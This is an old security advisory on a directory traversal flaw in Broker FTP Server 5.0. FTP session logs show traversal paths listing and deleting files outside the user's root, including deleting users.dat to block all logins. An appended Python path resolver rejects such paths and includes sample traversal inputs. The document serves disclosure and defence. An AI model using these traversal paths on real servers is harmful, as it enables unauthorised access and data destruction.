SECURITYVULNS:DOC:1349
Mar 05, 2001

Broker Ftp Server 5.0 Vulnerability


Vulnerability:

Users can break out of their root directory and list directories.
Depending on the privileges you have, other commands such as delete may be
executed outside of the home directory.

e:\crap\ was used as the home directory.
Deleting files in e:\crap is enabled.

Detail:

Problem: Again relative paths.

dir:
listing directories outside of root dir.
Risk: medium-high

230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29 bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 323 Bytes empfangen in 0,00Sekunden 323000,00KB/s
ftp> cd …
550 CWD failed. …: No permission

ftp> dir /…/experimental/broker/data/
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 175 Nov 19 2000 UserGrps.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Users.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:33 Users.4800.bak
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:34 Users.4800-Prof.bak
-rw-rw-rw- 1 ftp ftp 31 Mar 03 16:59 BannCtrl.ini
-rw-rw-rw- 1 ftp ftp 34 Mar 03 17:08 KickCtrl.ini
-rw-rw-rw- 1 ftp ftp 38 Mar 03 16:37 Events_1.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:53 Events_lst_1.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Kopie von Users.dat
226 File sent ok
FTP: 629 Bytes empfangen in 0,00Sekunden 629000,00KB/s

delete:
deleting files outside of root dir.

ftp> delete /…/experimental/broker/data/users.dat
250 File '/…/experimental/broker/data/users.dat' deleted.
ftp> quit
221-Thank you for your visit.
221-
221 Goodbye.

C:\>ftp 10.17.3.44
Verbindung mit 10.17.3.44 wurde hergestellt.
220 FTP Server ready [***]
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
530 Login incorrect.
Anmeldung fehlgeschlagen.
ftp> :(

By deleting users.dat, no one will be able to log on …

The put/get commands seem to be secure…

This was tested with Win2k and the trial version of Broker ver. 5.0.
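
The sessions above show dir and delete accepting a path outside the home directory while cd refuses it, which is what happens when each command validates its own argument. As an added example (not code from the advisory or from Broker FTP Server), here is a single resolver that every command goes through; the names resolve, replay, PathDenied and SESSION are hypothetical, and the sample session is constructed.

```python
import ntpath

class PathDenied(Exception):
    """A client-supplied path would leave the user's home directory."""

def resolve(home, cwd, arg):
    """Map an FTP path argument to a real Windows path inside `home`.

    home: real directory used as the FTP root; cwd: current virtual
    directory, starting with "/"; arg: argument of LIST, CWD, DELE, ...
    """
    if "\x00" in arg or ":" in arg:      # NUL, drive letters, stream names
        raise PathDenied(arg)
    virtual = arg.replace("\\", "/")
    if not virtual.startswith("/"):      # relative to the virtual cwd
        virtual = cwd.rstrip("/") + "/" + virtual
    parts = []
    for comp in virtual.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:                # would climb above the FTP root
                raise PathDenied(arg)
            parts.pop()
        elif comp.strip(". ") == "":     # "...", ". ." and other dot/space runs
            raise PathDenied(arg)
        else:
            parts.append(comp)
    real = ntpath.normpath(ntpath.join(home, *parts))
    # Second check on the normalised result: it must still sit under home.
    root = ntpath.normcase(ntpath.normpath(home)).rstrip("\\")
    if not (ntpath.normcase(real) + "\\").startswith(root + "\\"):
        raise PathDenied(arg)
    return real

def replay(home, session):
    """Send every (verb, cwd, arg) through the one resolver; return verdicts."""
    verdicts = []
    for verb, cwd, arg in session:
        try:
            verdicts.append((verb, resolve(home, cwd, arg)))
        except PathDenied:
            verdicts.append((verb, "550 denied"))
    return verdicts

# Constructed session, not captured from the product.
SESSION = [("LIST", "/", ""), ("LIST", "/", "/../experimental/broker/data/"),
           ("DELE", "/test", "../../experimental/broker/data/users.dat"),
           ("DELE", "/", "test/../bisontest.txt"), ("LIST", "/", "/.../x")]
```

Because LIST, CWD and DELE share the one code path, a path that is refused for one command is refused for all of them.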
